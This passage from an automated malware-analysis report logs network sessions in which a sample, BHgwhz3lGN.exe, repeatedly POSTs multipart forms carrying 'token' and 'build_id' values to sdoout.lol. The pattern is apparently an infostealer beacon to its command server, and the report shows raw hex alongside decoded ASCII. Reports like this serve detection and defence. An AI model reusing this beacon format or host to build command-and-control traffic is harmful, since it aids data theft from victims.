                                                                                                                                                                                                                                                                                          2024-12-30 14:56:00 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 77 6c 66 63 74 6a 77 74 6a 77 34 65 75 33 37 71 69 65 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 77 6c 66 63 74 6a 77 74 6a 77 34 65 75 33 37 71 69 65 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 77 6c 66 63 74 6a 77 74 6a 77 34 65 75 33 37 71 69 65 33 37 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------wlfctjwtjw4eu37qie37Content-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------wlfctjwtjw4eu37qie37Content-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------wlfctjwtjw4eu37qie37Cont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:01 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:01 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:01 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          54192.168.2.953981116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:01 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----2djeknyuk6f3e3ekx4op
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1825
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:01 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 32 64 6a 65 6b 6e 79 75 6b 36 66 33 65 33 65 6b 78 34 6f 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 32 64 6a 65 6b 6e 79 75 6b 36 66 33 65 33 65 6b 78 34 6f 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 32 64 6a 65 6b 6e 79 75 6b 36 66 33 65 33 65 6b 78 34 6f 70 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------2djeknyuk6f3e3ekx4opContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------2djeknyuk6f3e3ekx4opContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------2djeknyuk6f3e3ekx4opCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:02 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:02 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:02 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          55192.168.2.953982116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:02 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----58q9rqqqq1djmyu379r1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1841
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:02 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 35 38 71 39 72 71 71 71 71 31 64 6a 6d 79 75 33 37 39 72 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 35 38 71 39 72 71 71 71 71 31 64 6a 6d 79 75 33 37 39 72 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 35 38 71 39 72 71 71 71 71 31 64 6a 6d 79 75 33 37 39 72 31 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------58q9rqqqq1djmyu379r1Content-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------58q9rqqqq1djmyu379r1Content-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------58q9rqqqq1djmyu379r1Cont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:03 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:03 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:03 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          56192.168.2.953984116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:03 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----bas0zuaimgln7qqqi5xl
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1841
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:03 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 62 61 73 30 7a 75 61 69 6d 67 6c 6e 37 71 71 71 69 35 78 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 62 61 73 30 7a 75 61 69 6d 67 6c 6e 37 71 71 71 69 35 78 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 62 61 73 30 7a 75 61 69 6d 67 6c 6e 37 71 71 71 69 35 78 6c 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------bas0zuaimgln7qqqi5xlContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------bas0zuaimgln7qqqi5xlContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------bas0zuaimgln7qqqi5xlCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:04 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:04 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:04 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          57192.168.2.953985116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:04 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----n7y58q1v3op8qqq1djeu
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1837
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:04 UTC1837OUTData Raw: 2d 2d 2d 2d 2d 2d 6e 37 79 35 38 71 31 76 33 6f 70 38 71 71 71 31 64 6a 65 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 6e 37 79 35 38 71 31 76 33 6f 70 38 71 71 71 31 64 6a 65 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 6e 37 79 35 38 71 31 76 33 6f 70 38 71 71 71 31 64 6a 65 75 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------n7y58q1v3op8qqq1djeuContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------n7y58q1v3op8qqq1djeuContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------n7y58q1v3op8qqq1djeuCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:05 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:05 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:05 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          58192.168.2.953986116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:05 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----1n7qqiecj5x4eusjwbsr
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1837
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:05 UTC1837OUTData Raw: 2d 2d 2d 2d 2d 2d 31 6e 37 71 71 69 65 63 6a 35 78 34 65 75 73 6a 77 62 73 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 31 6e 37 71 71 69 65 63 6a 35 78 34 65 75 73 6a 77 62 73 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 31 6e 37 71 71 69 65 63 6a 35 78 34 65 75 73 6a 77 62 73 72 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------1n7qqiecj5x4eusjwbsrContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------1n7qqiecj5x4eusjwbsrContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------1n7qqiecj5x4eusjwbsrCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:06 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:06 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:06 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          59192.168.2.953987116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:06 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----1n7qqiecj5x4eusjwbsr
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1825
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:06 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 31 6e 37 71 71 69 65 63 6a 35 78 34 65 75 73 6a 77 62 73 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 31 6e 37 71 71 69 65 63 6a 35 78 34 65 75 73 6a 77 62 73 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 31 6e 37 71 71 69 65 63 6a 35 78 34 65 75 73 6a 77 62 73 72 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------1n7qqiecj5x4eusjwbsrContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------1n7qqiecj5x4eusjwbsrContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------1n7qqiecj5x4eusjwbsrCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:07 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:07 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:07 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          60192.168.2.953988116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:07 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----5f3oph4wb1dbaas00zcb
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1825
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:07 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 35 66 33 6f 70 68 34 77 62 31 64 62 61 61 73 30 30 7a 63 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 35 66 33 6f 70 68 34 77 62 31 64 62 61 61 73 30 30 7a 63 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 35 66 33 6f 70 68 34 77 62 31 64 62 61 61 73 30 30 7a 63 62 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------5f3oph4wb1dbaas00zcbContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------5f3oph4wb1dbaas00zcbContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------5f3oph4wb1dbaas00zcbCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:08 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:08 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:08 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          61192.168.2.953989116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:08 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----16890r168glf3ekf37qi
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1825
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:08 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 31 36 38 39 30 72 31 36 38 67 6c 66 33 65 6b 66 33 37 71 69 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 31 36 38 39 30 72 31 36 38 67 6c 66 33 65 6b 66 33 37 71 69 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 31 36 38 39 30 72 31 36 38 67 6c 66 33 65 6b 66 33 37 71 69 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------16890r168glf3ekf37qiContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------16890r168glf3ekf37qiContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------16890r168glf3ekf37qiCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:09 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:09 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:09 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          62192.168.2.953990116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:09 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----9r9r16ppzc2vaie3w47q
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1825
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:09 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 39 72 39 72 31 36 70 70 7a 63 32 76 61 69 65 33 77 34 37 71 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 39 72 39 72 31 36 70 70 7a 63 32 76 61 69 65 33 77 34 37 71 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 39 72 39 72 31 36 70 70 7a 63 32 76 61 69 65 33 77 34 37 71 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------9r9r16ppzc2vaie3w47qContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------9r9r16ppzc2vaie3w47qContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------9r9r16ppzc2vaie3w47qCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:10 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:10 GMT
